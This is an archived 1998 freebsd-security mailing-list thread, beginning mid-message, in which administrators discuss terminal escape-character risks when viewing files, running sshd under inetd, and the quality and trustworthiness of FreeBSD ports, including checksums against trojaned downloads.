21:29:49 -0500 (CDT) From: James Wyatt To: security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: <19980911124430.A15005@drwho.xnet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Michael Maxwell wrote: > On Thu, Sep 10, 1998 at 10:57:59AM -0700, patl@phoenix.volant.org wrote: > > No, I usually 'less', 'more', or even 'emacs' it. For two reasons. > > 1) INSTALL is usually too large to fit in a single terminal window; > > sometimes too large to fit in the default scrollbuffer. 2) It > > might contain characters that would make my terminal window do > > something I'd rather it didn't... > And another solution that has thus far been forgotten: file(1). I use this > routinely, on systems that have it, before I "cat" or "more" a file... 'file' only looks at enough of the file to characterize it and print something for the user. It catches binaries, but not someone who embedding a control char in an interactive session (chat, motd 8{), old finger, such) or somewhere down in a 'text' file. Having Who-R-You (Ctl-E) support is *very* handy, could we just make it static? Make it return 'xterm' and nothing else and it might be safe. James Wyatt (jwyatt@rwsystems.net) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 20:00:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA11696 for freebsd-security-outgoing; Sat, 12 Sep 1998 20:00:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11691 for ; Sat, 12 Sep 1998 20:00:18 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id TAA21632 for ; Sat, 12 Sep 1998 19:59:58 -0700 (PDT) Date: Sat, 12 Sep 1998 19:59:58 -0700 (PDT) From: Roger Marquis To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id UAA11692 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you're running inetd then it doesn't seem consistent to start daemons that don't need to run all the time from startup scripts. Inetd was designed to conserve memory. If you have it why not use it? /etc/inetd.conf is also a common place to implement access control (via tcp_wrappers). Other than that I've frequently run into situations where keepalives had to be turned off. In those cases ssh sessions invariably die and their daemons have to be killed-off by hand (kill ). As it is difficult to tell the original daemon from the child daemons it's also easy to accidentally kill the parent. If ssh is the only access you're locked-out. Easier and more consistent to use inetd where it's available, IMHO and YMMV. Roger Marquis Roble Systems Consulting http://www.roble.com/ On 13 Sep 1998, Dag-Erling [iso-8859-1] Coïdan[iso-8859-1] Smørgrav wrote: > "Much more reliable"? What's more reliable than 100%? Have you ever > experienced any problems running sshd from /usr/local/etc/rc.d/? I > haven't, and *all* boxes I control rely entirely on ssh for remote > access, and have inetd disabled. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 20:21:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA14011 for freebsd-security-outgoing; Sat, 12 Sep 1998 20:21:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA14005 for ; Sat, 12 Sep 1998 20:21:33 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id UAA21863 for ; Sat, 12 Sep 1998 20:21:19 -0700 (PDT) Date: Sat, 12 Sep 1998 20:21:19 -0700 (PDT) From: Roger Marquis To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 12 Sep 1998, Michael Sinatra wrote: > Is it supposed to offer any advantages other than being able to cd into > the ports directory and simply type 'make' and have the system fetch the > distribution and do everything for you, *and* be reasonably well-assured > that the beast is going to compile? That is a pretty huge advantage for > an overworked sysadmin like myself. True, and ports are probably the aspect of FreeBSD I appreciate most, however, the more ports I've used the more careful I've become about them. The basic downside to ports is their lack of standardization and QA. For one thing 'make -n install' typically doesn't yield readable information unless you first 'cd work/*'. Secondly, while port A installs under /usr/, port B installs to /usr/local/etc and port C in /usr/libexec, ... You can never be sure what is going where and it's a rare port that can be uninstalled with 'make uninstall'. There's also no way to validate all of the source hosts listed in the Makefile. We've downloaded hacked versions of a port and had to redownload and recompile when the hack became obvious (through corrupt syslogs and attempts to grab /pwd.db). Bottom line, ports are cool, no question, but not without risk. Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 20:47:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA16517 for freebsd-security-outgoing; Sat, 12 Sep 1998 20:47:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from redfish.go2net.com (redfish.go2net.com [207.178.55.5]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id UAA16502 for ; Sat, 12 Sep 1998 20:47:51 -0700 (PDT) (envelope-from marcs@go2net.com) Received: from marcs by redfish.go2net.com with smtp (Exim 1.82 #2) id 0zI372-000572-00; Sat, 12 Sep 1998 20:46:08 -0700 Date: Sat, 12 Sep 1998 20:46:08 -0700 (PDT) From: Marc Slemko X-Sender: marcs@redfish To: Roger Marquis cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 12 Sep 1998, Roger Marquis wrote: > Secondly, while port A installs under /usr/, port B installs to > /usr/local/etc and port C in /usr/libexec, ... You can never be sure Erm... any port that does so (with rare exceptions) is broken and should be fixed. > There's also no way to validate all of the source hosts listed in the > Makefile. We've downloaded hacked versions of a port and had to > redownload and recompile when the hack became obvious (through corrupt > syslogs and attempts to grab /pwd.db). I don't understand what you mean. What do you want to validate about the source host? That they exist? There is already a md5 in the port of the distribution tarball... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 21:36:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA19485 for freebsd-security-outgoing; Sat, 12 Sep 1998 21:36:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fallout.campusview.indiana.edu (fallout.campusview.indiana.edu [149.159.1.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA19469; Sat, 12 Sep 1998 21:36:26 -0700 (PDT) (envelope-from jfieber@indiana.edu) Received: from localhost (jfieber@localhost) by fallout.campusview.indiana.edu (8.8.8/8.8.7) with SMTP id XAA15989; Sat, 12 Sep 1998 23:35:54 -0500 (EST) Date: Sat, 12 Sep 1998 23:35:54 -0500 (EST) From: John Fieber To: Roger Marquis cc: freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [topic drift from security to ports; CC: added] On Sat, 12 Sep 1998, Roger Marquis wrote: > For one thing 'make -n install' typically doesn't yield readable > information unless you first 'cd work/*'. 'more pkg/PLIST' is generally more efficient......if the PLIST is accurate. > Secondly, while port A installs under /usr/, port B > installs to /usr/local/etc and port C in /usr/libexec, ... > You can never be sure what is going where and it's a rare > port that can be uninstalled with 'make uninstall'. I have 103 ports installed on my machine now. Not one of them *ever* installed anything in /usr/---I would have noticed right away because my /usr file system is read only. If you find a port that installs something (a) somewhere off limits or (b) somewhere okay but in a bone-headed layout, by all means submit a bug report to the maintainer. Is it better to make ports conform to a strict BSD style file layout or stick with the style native to the software being ported? If I only managed FreeBSD systems, I'd opt for strict BSD but since I manage a number of other platforms I also value cross-platform consistency which may sometimes mean using an un-BSD-like layout. Short of providing multiple layout options in the port, you can't satisfy everyone. A majority of the ports I've installed uninstall pretty cleanly. The most common offense is leaving empty directories around. Again, this is all a volunteer project. If you install a port and spot a problem, submit a patch to the maintainer listed in the makefile! A more frustrating problem for me are ports that are not ${PREFIX} != /usr/local compatible which makes it a hassle to install multiple version of a port or separate ports that have common files. Also, I occasionaly go through phases of liking SysV way of installing things in /opt/, /etc/opt/ and /var/opt/ which a simple 'make PREFIX=/opt/' doesn't really accomplish. > There's also no way to validate all of the source hosts listed in the > Makefile. We've downloaded hacked versions of a port and had to > redownload and recompile when the hack became obvious (through corrupt > syslogs and attempts to grab /pwd.db). Um, that is what the checksums on the distfiles are for. Not a 100% guarantee of not being hacked, but a reasonable defense if you trust the person who made the port. Again, I hope you reported these incidents to the maintainer of the port. -john To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message